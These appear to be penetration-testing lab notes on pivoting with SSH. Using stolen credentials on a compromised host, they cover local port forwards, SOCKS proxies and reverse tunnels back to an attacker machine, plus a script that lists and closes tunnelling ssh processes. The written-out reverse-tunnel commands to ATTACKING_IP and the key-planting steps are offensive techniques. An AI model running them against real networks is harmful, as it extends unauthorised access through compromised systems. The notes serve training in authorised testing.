OpenSSH allows us to make tunnels for port forwarding and proxies.

Forward Connection

We create a tunnel from our attacking box using the stolen credentials. This approach is more common against Unix hosts, since Linux servers often have an SSH port open.

Port Forwarding

For example, to reach 172.16.0.10:80 through the compromised host 172.16.0.5, we use the -L flag:

ssh -L 8000:172.16.0.10:80 USERNAME@172.16.0.5 -fN

The HTTP server is now reachable from our own machine on port 8000, i.e. at localhost:8000.

On a Windows host, allow inbound connections to the listening port through the local firewall with:

New-NetFirewallRule -Protocol TCP -LocalPort <port> -Direction Inbound -Action Allow -DisplayName SOCK

<aside> ⚠️ For Port forwarding on Windows, see ‣

</aside>

Proxy

With SSH we can also open a SOCKS proxy using the flag -D <port>. Once the connection is established, we can run tools through this proxy with proxychains, for instance.

ssh -D 1337 USERNAME@172.16.0.5 -fN

Reverse Connection

This method may be preferable when we have a shell on the target but no SSH access to it. However, it requires the target to connect back to the attacking machine, which is itself a security risk.

Set up

Generate a key pair on the attacking machine:

ssh-keygen

and add the public key to ~/.ssh/authorized_keys on the attacking machine, restricted so that the key can only be used for port forwarding:

command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty <public key>


Check that the SSH service is running on the attacking machine (and start it if it is not):

sudo systemctl status ssh

Finally, we transfer the private key to the target by whatever means are available.

From the target, we can now start the SSH reverse port forward with ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

ssh -R 8000:172.16.0.10:80 USERNAME@ATTACKING_IP -i KEYFILE -fN

Again, we now have access to the targeted website through localhost:8000 on the attacking machine.

<aside> 📌 The latest versions of SSH also offer a reverse SOCKS proxy, using the same concept as the SSH proxy above:

ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN

</aside>

<aside> 💡 Note: Modern Windows comes with a built-in SSH client available by default. This allows us to use this technique on Windows systems, even if there is no SSH server running on the Windows system we're connecting back from. In many ways, this makes the next task covering plink.exe redundant; however, it is still very relevant for older systems.

</aside>

Close tunnelling connections

Find the ssh processes with

ps aux | grep ssh


and kill them with

sudo kill PID
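Rather than eyeballing ps output, the tunnelling sessions can be picked out by their forwarding flags. The following POSIX shell script is an added example (not part of the original note) that lists every ssh client started with -L, -R or -D, which is also a handy check for tunnels you did not expect on a host; the ps sample it runs on is constructed.

```shell
#!/bin/sh
# Added example (not from the original note): enumerate ssh client processes
# that carry a forwarding flag, so tunnels can be reviewed before being killed.
# Works on `ps aux` output: column 11 is COMMAND, the rest are its arguments.

# Constructed `ps aux` sample (not captured from a real host): one local
# forward, one dynamic proxy, one reverse forward and one plain session.
SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1034 0.0 0.1 15000 6000 ? Ss 10:00 0:00 sshd: /usr/sbin/sshd -D [listener]
bob 2311 0.0 0.1 12000 5000 ? Ss 10:05 0:00 ssh -L 8000:172.16.0.10:80 USERNAME@172.16.0.5 -fN
bob 2350 0.0 0.1 12000 5000 ? Ss 10:06 0:00 /usr/bin/ssh -D1337 USERNAME@172.16.0.5 -fN
bob 2400 0.0 0.1 12000 5000 pts/1 S+ 10:07 0:00 ssh admin@10.0.0.3
bob 2455 0.0 0.1 12000 5000 ? Ss 10:08 0:00 ssh -R 8000:172.16.0.10:80 USERNAME@ATTACKING_IP -i KEYFILE -fN'

# list_tunnels: read ps lines on stdin; print "PID TYPE SPEC" for each ssh
# client started with -L (local), -R (reverse) or -D (dynamic/SOCKS).
# Handles both the "-L spec" and the attached "-L8000:..." form.
list_tunnels() {
    awk '
        {
            cmd = $11; sub(/.*\//, "", cmd)         # strip a leading path
            if (cmd != "ssh") next                  # skip sshd and other programs
            for (i = 12; i <= NF; i++) {
                if ($i ~ /^-[LRD]$/)      { spec = $(i + 1) }
                else if ($i ~ /^-[LRD]./) { spec = substr($i, 3) }
                else continue
                t = substr($i, 2, 1)
                type = (t == "L") ? "local" : (t == "R") ? "reverse" : "dynamic"
                print $2, type, spec
                break
            }
        }'
}

# tunnel_pids: only the PIDs, space separated on one line, ready for kill.
tunnel_pids() {
    list_tunnels | awk '{ printf "%s%s", (NR > 1 ? " " : ""), $1 } END { print "" }'
}

# Demonstration on the constructed sample. On a live host:
#   ps aux | list_tunnels                      # review first
#   ps aux | tunnel_pids | xargs -r sudo kill  # then close them
printf '%s\n' "$SAMPLE_PS" | list_tunnels
```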
